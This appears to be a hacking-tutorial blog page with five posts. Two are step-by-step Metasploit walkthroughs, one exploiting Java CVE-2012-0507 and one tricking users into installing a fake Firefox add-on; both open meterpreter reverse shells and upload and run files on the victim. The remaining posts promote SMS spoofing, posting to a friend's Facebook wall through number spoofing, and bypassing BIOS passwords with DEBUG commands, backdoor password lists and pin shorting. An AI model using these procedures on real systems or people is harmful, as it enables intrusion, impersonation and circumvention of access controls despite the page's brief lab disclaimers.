How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507

07:06 |

Requirements:


  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox.I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM? It's there in my posting...)


Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.


slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the which settings are available and/or required for this specific module.
Now type "set SRVPORT 80".
and  "set URIPATH /".

 Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

 set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST. 

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".
Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:
Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine. 
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:
Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.
Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.
You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.
Security Tips:
Update your JRE to the latest version.


Conclusion:
        I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!
Read More

Hacking Windows 7 & Xp with Fake Firefox add-on (XPI) : Metasploit Tutorials

07:03 |

I am going to explain how to hack any windows machine(xp,7) with the help of Metasploit.
Unlike last tutorial, we are not going to exploit any kind of vulnerabilities. We are going to use Social Engineering technique instead.

What exactly i am going to do?


  1. Create a fake firefox extension with Metasploit that creates a backdoor from the victim system.
  2. Trick users into installing the add-on
  3. Break into the Target Machine.
Pre-configuration:
  • As usual, you have to set up two virutal machines(VM ) in your virtualbox namely "Target" and "Attacker".
  • Install the windows xp or 7 in the Target VM.
  • Install the Backtrack in the Attacker VM.
Part I: Update the Metasploit 
As we are going to use the latest module, you are advised to update the Metasploit modules.  Don't know how to do this? No need to worry!
  • Open the Terminal 
  • type msfupdate
  • This will update the Metasploit with latest modules :)
Part II: Configuring settings in Metasploit for the fake-addon exploit
Step 1:

Open the Terminal and type "msfconsole" to get the Metasploit console.

Step 2:
Type "use exploit/multi/browser/firefox_xpi_bootstrapped_addon" in the console.

Step 3:
Now we have to know the list of settings available for this exploit module.  In order to get the list , you can type "show options" in the console.
  Unlike the last tutorial, this module has an extra settings for the module namely "addonname".

Step 4: Configurations
 Let us configure the setting for the exploit.
type the highlighted commands one by one in the console

Command: set addonname fake
Details: Name for the fake add-on.  you can change the "fake" to any name.

Command:set SRVHOST 192.168.56.11 
Details: Here the 192.168.56.11 is the ip of Backtrack .  You can get this ip by simply typing the "ifconfig" in the terminal. If you have trouble in getting the ip details, please drop your comment or read my previous post. 
Command: set SRVPORT 80
Details: Our server is going to be accessed via the port 80(default port)

Command: set URIPATH fakeEx
Details: The path in which the fake add-on will be available to download. For ex: http://192.168.56.11/fakeEx

Command: set LHOST 192.168.56.11 
Details: Here the 192.168.56.11 is the ip of Backtrack .  You can get this ip by simply typing the "ifconfig" in the terminal.

Step 5: Payload
 As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Part III: Social Engineering Attack

Successfully configured the settings for the exploit, what else?! let us launch the exploit.
Type "exploit" in the console.
Now the exploit is started.  Our fake add-on is available at, "http://192.168.56.11/fakeEx".
 Once victim visit the link, it will ask user to install the add-on in order to view the page.  Once user install the add-on, the system will be backdoor-ed.
 Now , You can control the victim system from meterpreter.
 Countermeasures:
       I believe you understand the risks of installing the add-on from unknown sources.  So, think twice before installing add-on .  Always use trusted add-on.  Search in the google for review about the add-on.

Disclaimer:
      The article given here is educational purpose only.  I suggest you to try this method in a controlled virtualbox environment.  I am not responsible for your illegal activity.
Read More

SMS from any mobile number to any mobile number

07:02 |

How to send SMS from any mobile number to any mobile number that means how to send SMS from your friend's mobile to your mobile or your friends mobile to your friends mobile or any other number. Basically this technique is call SMS spoofing. By SMS spoofing we can send SMS to any mobile using anyone's mobile number. How this trick can be helpful? its simple it is helpful when you wanna prank your friends, enemies or simply you want to send free SMS to your friends using their numbers only. So friends read on...

What is SMS Spoofing?
Spoofing is basically mimic of the original i.e. SMS spoofing basically is a technique to send anonymous SMS to any mobile number. By anonymous i mean that we can use any mobile number to send the SMS. 

This is not actually a trick or hack but it's a service that a company is providing but the only thing the company forgot is internal send ID Check i.e. which number we are using to send SMS. So this service allows us to send SMS from any number to any number that means. Now the number that we register will be shown to the victim.
Hence we are exploiting the Internal sender ID phone verification feature.

Feature's of SMS spoofing:
  1. Spoofed sms (any mobile number to any mobile number)
  2. 100% anonymous  messages
  3. Worldwide Network (i.e. we can send SMS all over the world)
  4. No advertisements
  5. Instant Delivery of SMS
How to use this Hack? 
1. First of all, register here .Fill as required...

2. After Registering you will get 25 free credits that means you can send 25 free SMS from any number to any number. For using it again register another mobile and email ID. 25 SMS is the limitation of this trick from one registered number.. Usually people have two to three sim's.
3.  Now after registering you will receive password on registered mobile number.
4. Now login with that password that you got on mobile.
5. Now go to Send SMS to number .
6. After entering the details. Click on send.
7. That's all the hack. I know its limited but its awesome...Isn't It..
Please : Do not use this for any illegal activities
Read More

Hack friends facebook wall 100% working

07:01 |

Needed:
Your friend should activate facebook mobile.

Procedure:
1)First find your friends mobile number from which he activated for facebook mobile
2)You can find your friends mobile number in his facebook profile,just go to "info" scroll down to bottom of the page.
        
 3)Now in the place of "SEND SMS TO" column type any one of the facebook number
facebook numbers:
919232232665
919223055519
919223055509
919223055508
919223055528.
 
4)In "SENDER ID FROM" column type your friends facebook activated mobile number.
 
5)In "Message box" type your message which will be shown as his status.
 
6)press "send sms" button you have done it...
 
Note : If facebook number is changed search it in google you will get a new one...
Read More

BIOS Password Crack

06:58 |

 This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:

Code:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer . It works on most versions of the AWARD BIOS.
Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.
Standard BIOS backdoor passwords 
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer’s backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to “_” in the US keyboard corresponds to “?” in some European keyboards (such as Italian and German ones), so — for example — you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.
Flashing BIOS via software
If you have access to the computer when it’s turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory. However, it might happen you don’t have one of those programs when you have access to the computer, so you’d better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
Code:
O 70 17
O 71 17
Q
PHOENIX BIOS
Code:
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don’t have CMOS)
Code:
O 70 2E
O 71 FF
Q
Note that the first letter is a “O” not the number “0″. The numbers which follow are two bytes in hex format.
Flashing BIOS via hardware 
If you can’t access the computer when it’s on, and the standard backdoor passwords didn’t work, you’ll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.
Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for “switching a jumper” I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard. To find the correct jumper you should read the motherboard’s manual.
Once you’ve located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) whilethe computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turnthe computer on for a few seconds to flash the BIOS.
If you don’t have the motherboard’s manual, you’ll have to “brute force” it… trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don’t know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.
If after flashing the BIOS, the computer won’t boot when you turn it on, turn it off, and wait some seconds before to retry.
Removing the battery
If you can’t find the jumper to flash the BIOS or if such jumper doesn’t exist, you can removethe battery that keeps the BIOS memory alive. It’s a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you’ll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I’d suggest you to remove it for about one hour to be sure, because if you put it back when the data aren’t erased yet you’ll have to wait more time, as you’ve never removed it. If at first it doesn’t work, try to remove the battery overnight.
Important note: in laptop and notebooks you don’t have to remove the computer’s power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
Code:
       gnd
       74
        |__________________
5v 75--|                   |
       |                   |
       |                   |
       |       CHIPS       |
   1 * |                   |
       |      P82C206      |
       |                   |
       |                   |
       |___________________|
        |                 |
        | gnd             | 5v
        12                32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
Code:
    80              51
     |______________|
81 -|                |- 50
    |                |
    |                |
    |      OPTi      |
    |                |
    |     F82C206    |
    |                |
100-|________________|-31
     ||           | |
   1 ||           | | 30
      3           26
Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery  (this means you can’t flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can’t be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
Code:
         __________
     1 -| *  U     |-  24 5v
     2 -|          |-  23
     3 -|          |-  22
     4 -|          |-  21 RCL (RAM Clear)
     5 -|          |-  20
     6 -|          |-  19
     7 -|          |-  18
     8 -|          |-  17
     9 -|          |-  16
    10 -|          |-  15
    11 -|          |-  14
gnd 12 -|__________|-  13
NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.
Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818. Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
Code:
5v
 24          20                   13
 |___________|____________________|
|                                  |
|             DALLAS               |
|>                                 |
|            DS12885S              |
|                                  |
|__________________________________|
 |                                |
 1                                12
                                  gnd
Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners – lower left and upper right. You might also try pins 12 and 20.
Code:
          __________
     1  -| *  U     |-  24 5v
     2  -|          |-  23
     3  -|          |-  22
     4  -|          |-  21
     5  -|          |-  20
     6  -|          |-  19
     7  -|          |-  18
     8  -|          |-  17
     9  -|          |-  16
    10  -|          |-  15
    11  -|          |-  14
gnd 12  -|__________|-  13
Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It’s a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you’ll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you’ll then plug the new chip, in the eventuality that you’ll have to change it again. If you can’t find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer’s website to see if there’s the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.
Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you’ll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn’t see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can’t find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .
Key Disk for Toshiba laptops
Some Toshiba notebooks allow to bypass BIOS by inserting a “key-disk” in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it’s not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for “KEY” :) followed by two zeroes). Once you have created the key disk put it into the notebook’s drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You’ll enter the BIOS configuration where you can set a new password.
Key protected cases
A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.
Read More